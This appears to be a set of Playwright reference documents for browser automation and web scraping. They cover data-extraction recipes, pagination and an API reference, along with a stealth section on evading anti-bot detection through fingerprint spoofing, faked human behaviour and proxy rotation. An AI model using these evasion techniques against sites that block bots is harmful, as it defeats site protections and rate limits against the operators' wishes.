CHROME_LINUX = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
# Firefox 121 on Windows
FIREFOX_WIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
```
**Rules:**
- Update UAs every 2-3 months as browser versions increment
- Match UA platform to `navigator.platform` override
- If using Chromium, use Chrome UAs. If Firefox, use Firefox UAs.
- Never use obviously fake or ancient UAs
### 3. Viewport and Screen Properties
Common real-world screen resolutions (from analytics data):
| Resolution | Market Share | Use For |
|-----------|-------------|---------|
| 1920x1080 | ~23% | Default choice |
| 1366x768 | ~14% | Laptop simulation |
| 1536x864 | ~9% | Scaled laptop |
| 1440x900 | ~7% | MacBook |
| 2560x1440 | ~5% | High-end desktop |
```python
import random
VIEWPORTS = [
{"width": 1920, "height": 1080},
{"width": 1366, "height": 768},
{"width": 1536, "height": 864},
{"width": 1440, "height": 900},
]
viewport = random.choice(VIEWPORTS)
context = await browser.new_context(
viewport=viewport,
screen=viewport, # screen should match viewport
)
```
### 4. Navigator Properties Hardening
```python
STEALTH_INIT = """
// Plugins (headless Chrome has 0 plugins, real Chrome has 3-5)
Object.defineProperty(navigator, 'plugins', {
get: () => {
const plugins = [
{ name: 'Chrome PDF Plugin', filename: 'internal-pdf-viewer' },
{ name: 'Chrome PDF Viewer', filename: 'mhjfbmdgcfjbbpaeojofohoefgiehjai' },
{ name: 'Native Client', filename: 'internal-nacl-plugin' },
];
plugins.length = 3;
return plugins;
},
});
// Languages
Object.defineProperty(navigator, 'languages', {
get: () => ['en-US', 'en'],
});
// Platform (match to user agent)
Object.defineProperty(navigator, 'platform', {
get: () => 'Win32', // or 'MacIntel' for macOS UA
});
// Hardware concurrency (real browsers report CPU cores)
Object.defineProperty(navigator, 'hardwareConcurrency', {
get: () => 8,
});
// Device memory (Chrome-specific)
Object.defineProperty(navigator, 'deviceMemory', {
get: () => 8,
});
// Connection info
Object.defineProperty(navigator, 'connection', {
get: () => ({
effectiveType: '4g',
rtt: 50,
downlink: 10,
saveData: false,
}),
});
"""
await context.add_init_script(STEALTH_INIT)
```
### 5. WebGL Fingerprint Evasion
Headless Chrome uses SwiftShader for WebGL, which anti-bot services detect.
```python
# Option A: Launch with a real GPU (headed mode on a machine with GPU)
browser = await p.chromium.launch(headless=False)
# Option B: Override WebGL renderer info
await page.add_init_script("""
const getParameter = WebGLRenderingContext.prototype.getParameter;
WebGLRenderingContext.prototype.getParameter = function(parameter) {
if (parameter === 37445) {
return 'Intel Inc.'; // UNMASKED_VENDOR_WEBGL
}
if (parameter === 37446) {
return 'Intel(R) Iris(TM) Plus Graphics 640'; // UNMASKED_RENDERER_WEBGL
}
return getParameter.call(this, parameter);
};
""")
```
### 6. Canvas Fingerprint Noise
Anti-bot services render text/shapes to a canvas and hash the output. Headless Chrome produces a different hash.
```python
await page.add_init_script("""
const originalToDataURL = HTMLCanvasElement.prototype.toDataURL;
HTMLCanvasElement.prototype.toDataURL = function(type) {
if (type === 'image/png' || type === undefined) {
// Add minimal noise to the canvas to change fingerprint
const ctx = this.getContext('2d');
if (ctx) {
const imageData = ctx.getImageData(0, 0, this.width, this.height);
for (let i = 0; i < imageData.data.length; i += 4) {
// Shift one channel by +/- 1 (imperceptible)
imageData.data[i] = imageData.data[i] ^ 1;
}
ctx.putImageData(imageData, 0, 0);
}
}
return originalToDataURL.apply(this, arguments);
};
""")
```
## Request Throttling Patterns
### Human-Like Delays
Real users do not click at machine speed. Add realistic delays between actions.
```python
import random
import asyncio
async def human_delay(action_type="browse"):
"""Add realistic delay based on action type."""
delays = {
"browse": (1.0, 3.0), # Browsing between pages
"read": (2.0, 8.0), # Reading content
"fill": (0.3, 0.8), # Between form fields
"click": (0.1, 0.5), # Before clicking
"scroll": (0.5, 1.5), # Between scroll actions
}
min_s, max_s = delays.get(action_type, (0.5, 2.0))
await asyncio.sleep(random.uniform(min_s, max_s))
```
### Request Rate Limiting
```python
import time
class RateLimiter:
"""Enforce minimum delay between requests."""
def __init__(self, min_interval_seconds=1.0):
self.min_interval = min_interval_seconds
self.last_request_time = 0
async def wait(self):
elapsed = time.time() - self.last_request_time
if elapsed < self.min_interval:
await asyncio.sleep(self.min_interval - elapsed)
self.last_request_time = time.time()
# Usage
limiter = RateLimiter(min_interval_seconds=2.0)
for url in urls:
await limiter.wait()
await page.goto(url)
```
### Exponential Backoff on Errors
```python
async def with_backoff(coro_factory, max_retries=5, base_delay=1.0):
for attempt in range(max_retries):
try:
return await coro_factory()
except Exception as e:
if attempt == max_retries - 1:
raise
delay = base_delay * (2 ** attempt) + random.uniform(0, 1)
print(f"Attempt {attempt + 1} failed: {e}. Retrying in {delay:.1f}s...")
await asyncio.sleep(delay)
```
## Proxy Rotation Strategies
### Single Proxy
```python
browser = await p.chromium.launch(
proxy={"server": "http://proxy.example.com:8080"}
)
```
### Authenticated Proxy
```python
context = await browser.new_context(
proxy={
"server": "http://proxy.example.com:8080",
"username": "user",
"password": "pass",
}
)
```
### Rotating Proxy Pool
```python
PROXIES = [
"http://proxy1.example.com:8080",
"http://proxy2.example.com:8080",
"http://proxy3.example.com:8080",
]
async def create_context_with_proxy(browser):
proxy = random.choice(PROXIES)
return await browser.new_context(
proxy={"server": proxy}
)
```
### Per-Request Proxy (via Context Rotation)
Playwright does not support per-request proxy switching. Achieve it by creating a new context for each request or batch:
```python
async def scrape_url(browser, url, proxy):
context = await browser.new_context(proxy={"server": proxy})
page = await context.new_page()
try:
await page.goto(url)
data = await extract_data(page)
return data
finally:
await context.close()
```
### SOCKS5 Proxy
```python
browser = await p.chromium.launch(
proxy={"server": "socks5://proxy.example.com:1080"}
)
```
## Headless Detection Avoidance
### Running Chrome Channel Instead of Chromium
The bundled Chromium binary has different properties than a real Chrome install. Using the Chrome channel makes the browser indistinguishable from a normal install.
```python
# Use installed Chrome instead of bundled Chromium
browser = await p.chromium.launch(channel="chrome", headless=True)
```
**Requirements:** Chrome must be installed on the system.
### New Headless Mode (Chrome 112+)
Chrome's "new headless" mode is harder to detect than the old one:
```python
browser = await p.chromium.launch(
args=["--headless=new"],
)
```
### Avoiding Common Flags
Do NOT pass these flags — they are headless-detection signals:
- `--disable-gpu` (old headless workaround, not needed)
- `--no-sandbox` (security risk, detectable)
- `--disable-setuid-sandbox` (same as above)
## Behavioral Evasion
### Mouse Movement Simulation
Anti-bot services track mouse events. A click without preceding mouse movement is suspicious.
```python
async def human_click(page, selector):
"""Click with preceding mouse movement."""
element = await page.query_selector(selector)
box = await element.bounding_box()
if box:
# Move to element with slight offset
x = box["x"] + box["width"] / 2 + random.uniform(-5, 5)
y = box["y"] + box["height"] / 2 + random.uniform(-5, 5)
await page.mouse.move(x, y, steps=random.randint(5, 15))
await asyncio.sleep(random.uniform(0.05, 0.2))
await page.mouse.click(x, y)
```
### Typing Speed Variation
```python
async def human_type(page, selector, text):
"""Type with variable speed like a human."""
await page.click(selector)
for char in text:
await page.keyboard.type(char)
# Faster for common keys, slower for special characters
if char in "aeiou tnrs":
await asyncio.sleep(random.uniform(0.03, 0.08))
else:
await asyncio.sleep(random.uniform(0.08, 0.20))
```
### Scroll Behavior
Real users scroll gradually, not in instant jumps.
```python
async def human_scroll(page, distance=None):
"""Scroll down gradually like a human."""
if distance is None:
distance = random.randint(300, 800)
current = 0
while current < distance:
step = random.randint(50, 150)
await page.mouse.wheel(0, step)
current += step
await asyncio.sleep(random.uniform(0.05, 0.15))
```
## Detection Testing
### Self-Check Script
Navigate to these URLs to test your stealth configuration:
- `https://bot.sannysoft.com/` — Comprehensive bot detection test
- `https://abrahamjuliot.github.io/creepjs/` — Advanced fingerprint analysis
- `https://browserleaks.com/webgl` — WebGL fingerprint details
- `https://browserleaks.com/canvas` — Canvas fingerprint details
### Quick Test Pattern
```python
async def test_stealth(page):
"""Navigate to detection test page and report results."""
await page.goto("https://bot.sannysoft.com/")
await page.wait_for_timeout(3000)
# Check for failed tests
failed = await page.eval_on_selector_all(
"td.failed",
"els => els.map(e => e.parentElement.querySelector('td').textContent)"
)
if failed:
print(f"FAILED checks: {failed}")
else:
print("All checks passed.")
await page.screenshot(path="stealth_test.png", full_page=True)
```
## Recommended Stealth Stack
For most automation tasks, apply these in order of priority:
1. **WebDriver flag removal** — Critical, takes 2 lines
2. **Custom user agent** — Critical, takes 1 line
3. **Viewport configuration** — High priority, takes 1 line
4. **Request delays** — High priority, add random.uniform() calls
5. **Navigator properties** — Medium priority, init script block
6. **Chrome channel** — Medium priority, one launch option
7. **WebGL override** — Low priority unless hitting advanced anti-bot
8. **Canvas noise** — Low priority unless hitting advanced anti-bot
9. **Proxy rotation** — Only for high-volume or repeated scraping
10. **Behavioral simulation** — Only for sites with behavioral analysis

View File

@@ -0,0 +1,580 @@
# Data Extraction Recipes
Practical patterns for extracting structured data from web pages using Playwright. Each recipe is a self-contained pattern you can adapt to your target site.
## CSS Selector Patterns for Common Structures
### E-Commerce Product Listings
```python
PRODUCT_SELECTORS = {
"container": "div.product-card, article.product, li.product-item",
"fields": {
"title": "h2.product-title, h3.product-name, [data-testid='product-title']",
"price": "span.price, .product-price, [data-testid='price']",
"original_price": "span.original-price, .was-price, del",
"rating": "span.rating, .star-rating, [data-rating]",
"review_count": "span.review-count, .num-reviews",
"image_url": "img.product-image::attr(src), img::attr(data-src)",
"product_url": "a.product-link::attr(href), h2 a::attr(href)",
"availability": "span.stock-status, .availability",
}
}
```
### News/Blog Article Listings
```python
ARTICLE_SELECTORS = {
"container": "article, div.post, div.article-card",
"fields": {
"headline": "h2 a, h3 a, .article-title",
"summary": "p.excerpt, .article-summary, .post-excerpt",
"author": "span.author, .byline, [rel='author']",
"date": "time, span.date, .published-date",
"category": "span.category, a.tag, .article-category",
"url": "h2 a::attr(href), .article-title a::attr(href)",
"image_url": "img.thumbnail::attr(src), .article-image img::attr(src)",
}
}
```
### Job Listings
```python
JOB_SELECTORS = {
"container": "div.job-card, li.job-listing, article.job",
"fields": {
"title": "h2.job-title, a.job-link, [data-testid='job-title']",
"company": "span.company-name, .employer, [data-testid='company']",
"location": "span.location, .job-location, [data-testid='location']",
"salary": "span.salary, .compensation, [data-testid='salary']",
"job_type": "span.job-type, .employment-type",
"posted_date": "time, span.posted, .date-posted",
"url": "a.job-link::attr(href), h2 a::attr(href)",
}
}
```
### Search Engine Results
```python
SERP_SELECTORS = {
"container": "div.g, .search-result, li.result",
"fields": {
"title": "h3, .result-title",
"url": "a::attr(href), cite",
"snippet": "div.VwiC3b, .result-snippet, .search-description",
"displayed_url": "cite, .result-url",
}
}
```
## Table Extraction Recipes
### Simple HTML Table to JSON
The most common extraction pattern. Works for any standard `<table>` with `<thead>` and `<tbody>`.
```python
async def extract_table(page, table_selector="table"):
"""Extract an HTML table into a list of dictionaries."""
data = await page.evaluate(f"""
(selector) => {{
const table = document.querySelector(selector);
if (!table) return null;
// Get headers
const headers = Array.from(table.querySelectorAll('thead th, thead td'))
.map(th => th.textContent.trim());
// If no thead, use first row as headers
if (headers.length === 0) {{
const firstRow = table.querySelector('tr');
if (firstRow) {{
headers.push(...Array.from(firstRow.querySelectorAll('th, td'))
.map(cell => cell.textContent.trim()));
}}
}}
// Get data rows
const rows = Array.from(table.querySelectorAll('tbody tr'));
return rows.map(row => {{
const cells = Array.from(row.querySelectorAll('td'));
const obj = {{}};
cells.forEach((cell, i) => {{
if (i < headers.length) {{
obj[headers[i]] = cell.textContent.trim();
}}
}});
return obj;
}});
}}
""", table_selector)
return data or []
```
### Table with Links and Attributes
When table cells contain links or data attributes, not just text:
```python
async def extract_rich_table(page, table_selector="table"):
"""Extract table including links and data attributes."""
return await page.evaluate(f"""
(selector) => {{
const table = document.querySelector(selector);
if (!table) return [];
const headers = Array.from(table.querySelectorAll('thead th'))
.map(th => th.textContent.trim());
return Array.from(table.querySelectorAll('tbody tr')).map(row => {{
const obj = {{}};
Array.from(row.querySelectorAll('td')).forEach((cell, i) => {{
const key = headers[i] || `col_${{i}}`;
obj[key] = cell.textContent.trim();
// Extract link if present
const link = cell.querySelector('a');
if (link) {{
obj[key + '_url'] = link.href;
}}
// Extract data attributes
for (const attr of cell.attributes) {{
if (attr.name.startsWith('data-')) {{
obj[key + '_' + attr.name] = attr.value;
}}
}}
}});
return obj;
}});
}}
""", table_selector)
```
### Multi-Page Table (Paginated)
```python
async def extract_paginated_table(page, table_selector, next_selector, max_pages=50):
"""Extract data from a table that spans multiple pages."""
all_rows = []
headers = None
for page_num in range(max_pages):
# Extract current page
page_data = await page.evaluate(f"""
(selector) => {{
const table = document.querySelector(selector);
if (!table) return {{ headers: [], rows: [] }};
const hs = Array.from(table.querySelectorAll('thead th'))
.map(th => th.textContent.trim());
const rs = Array.from(table.querySelectorAll('tbody tr')).map(row =>
Array.from(row.querySelectorAll('td')).map(td => td.textContent.trim())
);
return {{ headers: hs, rows: rs }};
}}
""", table_selector)
if headers is None and page_data["headers"]:
headers = page_data["headers"]
for row in page_data["rows"]:
all_rows.append(dict(zip(headers or [], row)))
# Check for next page
next_btn = page.locator(next_selector)
if await next_btn.count() == 0 or await next_btn.is_disabled():
break
await next_btn.click()
await page.wait_for_load_state("networkidle")
await page.wait_for_timeout(random.randint(800, 2000))
return all_rows
```
## Product Listing Extraction
### Generic Listing Extractor
Works for any repeating card/list pattern:
```python
async def extract_listings(page, container_sel, field_map):
"""
Extract data from repeating elements.
field_map: dict mapping field names to CSS selectors.
Special suffixes:
::attr(name) — extract attribute instead of text
::html — extract innerHTML
"""
items = []
cards = await page.query_selector_all(container_sel)
for card in cards:
item = {}
for field_name, selector in field_map.items():
try:
if "::attr(" in selector:
sel, attr = selector.split("::attr(")
attr = attr.rstrip(")")
el = await card.query_selector(sel)
item[field_name] = await el.get_attribute(attr) if el else None
elif selector.endswith("::html"):
sel = selector.replace("::html", "")
el = await card.query_selector(sel)
item[field_name] = await el.inner_html() if el else None
else:
el = await card.query_selector(selector)
item[field_name] = (await el.text_content()).strip() if el else None
except Exception:
item[field_name] = None
items.append(item)
return items
```
### With Price Parsing
```python
import re
def parse_price(text):
"""Extract numeric price from text like '$1,234.56' or '1.234,56 EUR'."""
if not text:
return None
# Remove currency symbols and whitespace
cleaned = re.sub(r'[^\d.,]', '', text.strip())
if not cleaned:
return None
# Handle European format (1.234,56)
if ',' in cleaned and '.' in cleaned:
if cleaned.rindex(',') > cleaned.rindex('.'):
cleaned = cleaned.replace('.', '').replace(',', '.')
else:
cleaned = cleaned.replace(',', '')
elif ',' in cleaned:
# Could be 1,234 or 1,23 — check decimal places
parts = cleaned.split(',')
if len(parts[-1]) <= 2:
cleaned = cleaned.replace(',', '.')
else:
cleaned = cleaned.replace(',', '')
try:
return float(cleaned)
except ValueError:
return None
async def extract_products_with_prices(page, container_sel, field_map, price_field="price"):
"""Extract listings and parse prices into floats."""
items = await extract_listings(page, container_sel, field_map)
for item in items:
if price_field in item and item[price_field]:
item[f"{price_field}_raw"] = item[price_field]
item[price_field] = parse_price(item[price_field])
return items
```
## Pagination Handling
### Next-Button Pagination
The most common pattern. Click "Next" until the button disappears or is disabled.
```python
async def paginate_via_next_button(page, next_selector, content_selector, max_pages=100):
"""
Yield page objects as you paginate through results.
next_selector: CSS selector for the "Next" button/link
content_selector: CSS selector to wait for after navigation (confirms new page loaded)
"""
pages_scraped = 0
while pages_scraped < max_pages:
yield page # Caller extracts data from current page
pages_scraped += 1
next_btn = page.locator(next_selector)
if await next_btn.count() == 0:
break
try:
is_disabled = await next_btn.is_disabled()
except Exception:
is_disabled = True
if is_disabled:
break
await next_btn.click()
await page.wait_for_selector(content_selector, state="attached")
await page.wait_for_timeout(random.randint(500, 1500))
```
### URL-Based Pagination
When pages follow a predictable URL pattern:
```python
async def paginate_via_url(page, url_template, start=1, max_pages=100):
"""
Navigate through pages using URL parameters.
url_template: URL with {page} placeholder, e.g., "https://example.com/search?page={page}"
"""
for page_num in range(start, start + max_pages):
url = url_template.format(page=page_num)
response = await page.goto(url, wait_until="networkidle")
if response and response.status == 404:
break
yield page, page_num
await page.wait_for_timeout(random.randint(800, 2500))
```
### Infinite Scroll
For sites that load content as you scroll:
```python
async def paginate_via_scroll(page, item_selector, max_scrolls=100, no_change_limit=3):
"""
Scroll to load more content until no new items appear.
item_selector: CSS selector for individual items (used to count progress)
no_change_limit: Stop after N scrolls with no new items
"""
previous_count = 0
no_change_streak = 0
for scroll_num in range(max_scrolls):
# Count current items
current_count = await page.locator(item_selector).count()
if current_count == previous_count:
no_change_streak += 1
if no_change_streak >= no_change_limit:
break
else:
no_change_streak = 0
previous_count = current_count
# Scroll to bottom
await page.evaluate("window.scrollTo(0, document.body.scrollHeight)")
await page.wait_for_timeout(random.randint(1000, 2500))
# Check for "Load More" button that might appear
load_more = page.locator("button:has-text('Load More'), button:has-text('Show More')")
if await load_more.count() > 0 and await load_more.is_visible():
await load_more.click()
await page.wait_for_timeout(random.randint(1000, 2000))
return current_count
```
### Load-More Button
Simpler variant of infinite scroll where content loads via a button:
```python
async def paginate_via_load_more(page, button_selector, item_selector, max_clicks=50):
"""Click a 'Load More' button repeatedly until it disappears."""
for click_num in range(max_clicks):
btn = page.locator(button_selector)
if await btn.count() == 0 or not await btn.is_visible():
break
count_before = await page.locator(item_selector).count()
await btn.click()
# Wait for new items to appear
try:
await page.wait_for_function(
f"document.querySelectorAll('{item_selector}').length > {count_before}",
timeout=10000,
)
except Exception:
break # No new items loaded
await page.wait_for_timeout(random.randint(500, 1500))
return await page.locator(item_selector).count()
```
## Nested Data Extraction
### Comments with Replies (Threaded)
```python
async def extract_threaded_comments(page, parent_selector=".comments"):
"""Recursively extract threaded comments."""
return await page.evaluate(f"""
(parentSelector) => {{
function extractThread(container) {{
const comments = [];
const directChildren = container.querySelectorAll(':scope > .comment');
for (const comment of directChildren) {{
const authorEl = comment.querySelector('.author, .username');
const textEl = comment.querySelector('.comment-text, .comment-body');
const dateEl = comment.querySelector('time, .date');
const repliesContainer = comment.querySelector('.replies, .children');
comments.push({{
author: authorEl ? authorEl.textContent.trim() : null,
text: textEl ? textEl.textContent.trim() : null,
date: dateEl ? (dateEl.getAttribute('datetime') || dateEl.textContent.trim()) : null,
replies: repliesContainer ? extractThread(repliesContainer) : [],
}});
}}
return comments;
}}
const root = document.querySelector(parentSelector);
return root ? extractThread(root) : [];
}}
""", parent_selector)
```
### Nested Categories (Sidebar/Menu)
```python
async def extract_category_tree(page, root_selector="nav.categories"):
"""Extract nested category structure from a sidebar or menu."""
return await page.evaluate(f"""
(rootSelector) => {{
function extractLevel(container) {{
const items = [];
const directItems = container.querySelectorAll(':scope > li, :scope > div.category');
for (const item of directItems) {{
const link = item.querySelector(':scope > a');
const subMenu = item.querySelector(':scope > ul, :scope > div.sub-categories');
items.push({{
name: link ? link.textContent.trim() : item.textContent.trim().split('\\n')[0],
url: link ? link.href : null,
children: subMenu ? extractLevel(subMenu) : [],
}});
}}
return items;
}}
const root = document.querySelector(rootSelector);
return root ? extractLevel(root.querySelector('ul') || root) : [];
}}
""", root_selector)
```
### Accordion/Expandable Content
Some content is hidden behind accordion/expand toggles. Click to reveal, then extract.
```python
async def extract_accordion(page, toggle_selector, content_selector):
"""Expand all accordion items and extract their content."""
items = []
toggles = await page.query_selector_all(toggle_selector)
for toggle in toggles:
title = (await toggle.text_content()).strip()
# Click to expand
await toggle.click()
await page.wait_for_timeout(300)
# Find the associated content panel
content = await toggle.evaluate_handle(
f"el => el.closest('.accordion-item, .faq-item')?.querySelector('{content_selector}')"
)
body = None
if content:
body = (await content.text_content())
if body:
body = body.strip()
items.append({"title": title, "content": body})
return items
```
## Data Cleaning Utilities
### Post-Extraction Cleaning
```python
import re
def clean_text(text):
"""Normalize whitespace, remove zero-width characters."""
if not text:
return None
# Remove zero-width characters
text = re.sub(r'[\u200b\u200c\u200d\ufeff]', '', text)
# Normalize whitespace
text = re.sub(r'\s+', ' ', text).strip()
return text if text else None
def clean_url(url, base_url=None):
"""Convert relative URLs to absolute."""
if not url:
return None
url = url.strip()
if url.startswith("//"):
return "https:" + url
if url.startswith("/") and base_url:
return base_url.rstrip("/") + url
return url
def deduplicate(items, key_field):
"""Remove duplicate items based on a key field."""
seen = set()
unique = []
for item in items:
key = item.get(key_field)
if key and key not in seen:
seen.add(key)
unique.append(item)
return unique
```
### Output Formats
```python
import json
import csv
import io
def to_jsonl(items, file_path):
"""Write items as JSON Lines (one JSON object per line)."""
with open(file_path, "w") as f:
for item in items:
f.write(json.dumps(item, ensure_ascii=False) + "\n")
def to_csv(items, file_path):
"""Write items as CSV."""
if not items:
return
headers = list(items[0].keys())
with open(file_path, "w", newline="") as f:
writer = csv.DictWriter(f, fieldnames=headers)
writer.writeheader()
writer.writerows(items)
def to_json(items, file_path, indent=2):
"""Write items as a JSON array."""
with open(file_path, "w") as f:
json.dump(items, f, indent=indent, ensure_ascii=False)
```

View File

@@ -0,0 +1,492 @@
# Playwright Browser API Reference (Automation Focus)
This reference covers Playwright's Python async API for browser automation tasks — NOT testing. For test-specific APIs (assertions, fixtures, test runners), see playwright-pro.
## Browser Launch & Context
### Launching the Browser
```python
from playwright.async_api import async_playwright
async with async_playwright() as p:
# Chromium (recommended for most automation)
browser = await p.chromium.launch(headless=True)
# Firefox (better for some anti-detection scenarios)
browser = await p.firefox.launch(headless=True)
# WebKit (Safari engine — useful for Apple-specific sites)
browser = await p.webkit.launch(headless=True)
```
**Launch options:**
| Option | Type | Default | Purpose |
|--------|------|---------|---------|
| `headless` | bool | True | Run without visible window |
| `slow_mo` | int | 0 | Milliseconds to slow each operation (debugging) |
| `proxy` | dict | None | Proxy server configuration |
| `args` | list | [] | Additional Chromium flags |
| `downloads_path` | str | None | Directory for downloads |
| `channel` | str | None | Browser channel: "chrome", "msedge" |
### Browser Contexts (Session Isolation)
Browser contexts are isolated environments within a single browser instance. Each context has its own cookies, localStorage, and cache. Use them instead of launching multiple browsers.
```python
# Create isolated context
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
user_agent="Mozilla/5.0 ...",
locale="en-US",
timezone_id="America/New_York",
geolocation={"latitude": 40.7128, "longitude": -74.0060},
permissions=["geolocation"],
)
# Multiple contexts share one browser (resource efficient)
context_a = await browser.new_context() # User A session
context_b = await browser.new_context() # User B session
```
### Storage State (Session Persistence)
```python
# Save state after login (cookies + localStorage)
await context.storage_state(path="auth_state.json")
# Restore state in new context
context = await browser.new_context(storage_state="auth_state.json")
```
## Page Navigation
### Basic Navigation
```python
page = await context.new_page()
# Navigate with different wait strategies
await page.goto("https://example.com") # Default: "load"
await page.goto("https://example.com", wait_until="domcontentloaded") # Faster
await page.goto("https://example.com", wait_until="networkidle") # Wait for network quiet
await page.goto("https://example.com", timeout=30000) # Custom timeout (ms)
```
**`wait_until` options:**
- `"load"` — wait for the `load` event (all resources loaded)
- `"domcontentloaded"` — DOM is ready, images/styles may still load
- `"networkidle"` — no network requests for 500ms (best for SPAs)
- `"commit"` — response received, before any rendering
### Wait Strategies
```python
# Wait for a specific element to appear
await page.wait_for_selector("div.content", state="visible")
await page.wait_for_selector("div.loading", state="hidden") # Wait for loading to finish
await page.wait_for_selector("table tbody tr", state="attached") # In DOM but maybe not visible
# Wait for URL change
await page.wait_for_url("**/dashboard**")
await page.wait_for_url(re.compile(r"/dashboard/\d+"))
# Wait for specific network response
async with page.expect_response("**/api/data*") as resp_info:
await page.click("button.load")
response = await resp_info.value
json_data = await response.json()
# Wait for page load state
await page.wait_for_load_state("networkidle")
# Fixed wait (use sparingly — prefer the methods above)
await page.wait_for_timeout(1000) # milliseconds
```
### Navigation History
```python
await page.go_back()
await page.go_forward()
await page.reload()
```
## Element Interaction
### Finding Elements
```python
# Single element (returns first match)
element = await page.query_selector("css=div.product")
element = await page.query_selector("xpath=//div[@class='product']")
# Multiple elements
elements = await page.query_selector_all("div.product")
# Locator API (recommended — auto-waits, re-queries on each action)
locator = page.locator("div.product")
count = await locator.count()
first = locator.first
nth = locator.nth(2)
```
**Locator vs query_selector:**
- `query_selector` — returns an ElementHandle at a point in time. Can go stale if DOM changes.
- `locator` — returns a Locator that re-queries each time you interact with it. Preferred for reliability.
### Clicking
```python
await page.click("button.submit")
await page.click("a:has-text('Next')")
await page.dblclick("div.editable")
await page.click("button", position={"x": 10, "y": 10}) # Click at offset
await page.click("button", force=True) # Skip actionability checks
await page.click("button", modifiers=["Shift"]) # With modifier key
```
### Text Input
```python
# Fill (clears existing content first)
await page.fill("input#email", "user@example.com")
# Type (simulates keystroke-by-keystroke input — slower, more realistic)
await page.type("input#search", "query text", delay=50) # 50ms between keys
# Press specific keys
await page.press("input#search", "Enter")
await page.press("body", "Control+a")
```
### Dropdowns & Select
```python
# Native <select> element
await page.select_option("select#country", value="US")
await page.select_option("select#country", label="United States")
await page.select_option("select#tags", value=["tag1", "tag2"]) # Multi-select
# Custom dropdown (non-native)
await page.click("div.dropdown-trigger")
await page.click("li.option:has-text('United States')")
```
### Checkboxes & Radio Buttons
```python
await page.check("input#agree")
await page.uncheck("input#newsletter")
is_checked = await page.is_checked("input#agree")
```
### File Upload
```python
# Standard file input
await page.set_input_files("input[type='file']", "/path/to/file.pdf")
await page.set_input_files("input[type='file']", ["/path/a.pdf", "/path/b.pdf"])
# Clear file selection
await page.set_input_files("input[type='file']", [])
# Non-standard upload (drag-and-drop zones)
async with page.expect_file_chooser() as fc_info:
await page.click("div.upload-zone")
file_chooser = await fc_info.value
await file_chooser.set_files("/path/to/file.pdf")
```
### Hover & Focus
```python
await page.hover("div.menu-item")
await page.focus("input#search")
```
## Data Extraction
### Text Content
```python
# Get text content of an element
text = await page.text_content("h1.title")
inner_text = await page.inner_text("div.description") # Visible text only
inner_html = await page.inner_html("div.content") # HTML markup
# Get attribute
href = await page.get_attribute("a.link", "href")
src = await page.get_attribute("img.photo", "src")
```
### JavaScript Evaluation
```python
# Evaluate in page context
title = await page.evaluate("document.title")
scroll_height = await page.evaluate("document.body.scrollHeight")
# Evaluate on a specific element
text = await page.eval_on_selector("h1", "el => el.textContent")
texts = await page.eval_on_selector_all("li", "els => els.map(e => e.textContent.trim())")
# Complex extraction
data = await page.evaluate("""
() => {
const rows = document.querySelectorAll('table tbody tr');
return Array.from(rows).map(row => {
const cells = row.querySelectorAll('td');
return {
name: cells[0]?.textContent.trim(),
value: cells[1]?.textContent.trim(),
};
});
}
""")
```
### Screenshots & PDF
```python
# Full page screenshot
await page.screenshot(path="page.png", full_page=True)
# Viewport screenshot
await page.screenshot(path="viewport.png")
# Element screenshot
await page.locator("div.chart").screenshot(path="chart.png")
# PDF (Chromium only)
await page.pdf(path="page.pdf", format="A4", print_background=True)
# Screenshot as bytes (for processing without saving)
buffer = await page.screenshot()
```
## Network Interception
### Monitoring Requests
```python
# Listen for all responses
page.on("response", lambda response: print(f"{response.status} {response.url}"))
# Wait for a specific API call
async with page.expect_response("**/api/products*") as resp:
await page.click("button.load")
response = await resp.value
data = await response.json()
```
### Blocking Resources (Speed Up Scraping)
```python
# Block images, fonts, and CSS to speed up scraping
await page.route("**/*.{png,jpg,jpeg,gif,svg,woff,woff2,ttf}", lambda route: route.abort())
await page.route("**/*.css", lambda route: route.abort())
# Block specific domains (ads, analytics)
await page.route("**/google-analytics.com/**", lambda route: route.abort())
await page.route("**/facebook.com/**", lambda route: route.abort())
```
### Modifying Requests
```python
# Add custom headers
await page.route("**/*", lambda route: route.continue_(headers={
**route.request.headers,
"X-Custom-Header": "value"
}))
# Mock API responses
await page.route("**/api/data", lambda route: route.fulfill(
status=200,
content_type="application/json",
body=json.dumps({"items": []}),
))
```
## Dialog Handling
```python
# Auto-accept all dialogs
page.on("dialog", lambda dialog: dialog.accept())
# Handle specific dialog types
async def handle_dialog(dialog):
if dialog.type == "confirm":
await dialog.accept()
elif dialog.type == "prompt":
await dialog.accept("my input")
elif dialog.type == "alert":
await dialog.dismiss()
page.on("dialog", handle_dialog)
```
## File Downloads
```python
# Wait for download to start
async with page.expect_download() as dl_info:
await page.click("a.download-link")
download = await dl_info.value
# Save to specific path
await download.save_as("/path/to/downloads/" + download.suggested_filename)
# Get download as bytes
path = await download.path() # Temp file path
# Set download behavior at context level
context = await browser.new_context(accept_downloads=True)
```
## Frames & Iframes
```python
# Access iframe by selector
frame = page.frame_locator("iframe#content")
await frame.locator("button.submit").click()
# Access frame by name
frame = page.frame(name="editor")
# Access all frames
for frame in page.frames:
print(frame.url)
```
## Cookie Management
```python
# Get all cookies
cookies = await context.cookies()
# Get cookies for specific URL
cookies = await context.cookies(["https://example.com"])
# Add cookies
await context.add_cookies([{
"name": "session",
"value": "abc123",
"domain": "example.com",
"path": "/",
"httpOnly": True,
"secure": True,
}])
# Clear cookies
await context.clear_cookies()
```
## Concurrency Patterns
### Multiple Pages in One Context
```python
# Open multiple tabs in the same session
pages = []
for url in urls:
page = await context.new_page()
await page.goto(url)
pages.append(page)
# Process all pages
for page in pages:
data = await extract_data(page)
await page.close()
```
### Multiple Contexts for Parallel Sessions
```python
import asyncio
async def scrape_with_context(browser, url):
context = await browser.new_context(user_agent=random.choice(USER_AGENTS))
page = await context.new_page()
await page.goto(url)
data = await extract_data(page)
await context.close()
return data
# Run 5 concurrent scraping tasks
tasks = [scrape_with_context(browser, url) for url in urls[:5]]
results = await asyncio.gather(*tasks)
```
## Init Scripts (Stealth)
Init scripts run before any page script, in every new page/context.
```python
# Remove webdriver flag
await context.add_init_script("""
Object.defineProperty(navigator, 'webdriver', {get: () => undefined});
""")
# Override plugins (headless Chrome has empty plugins)
await context.add_init_script("""
Object.defineProperty(navigator, 'plugins', {
get: () => [1, 2, 3, 4, 5],
});
""")
# Override languages
await context.add_init_script("""
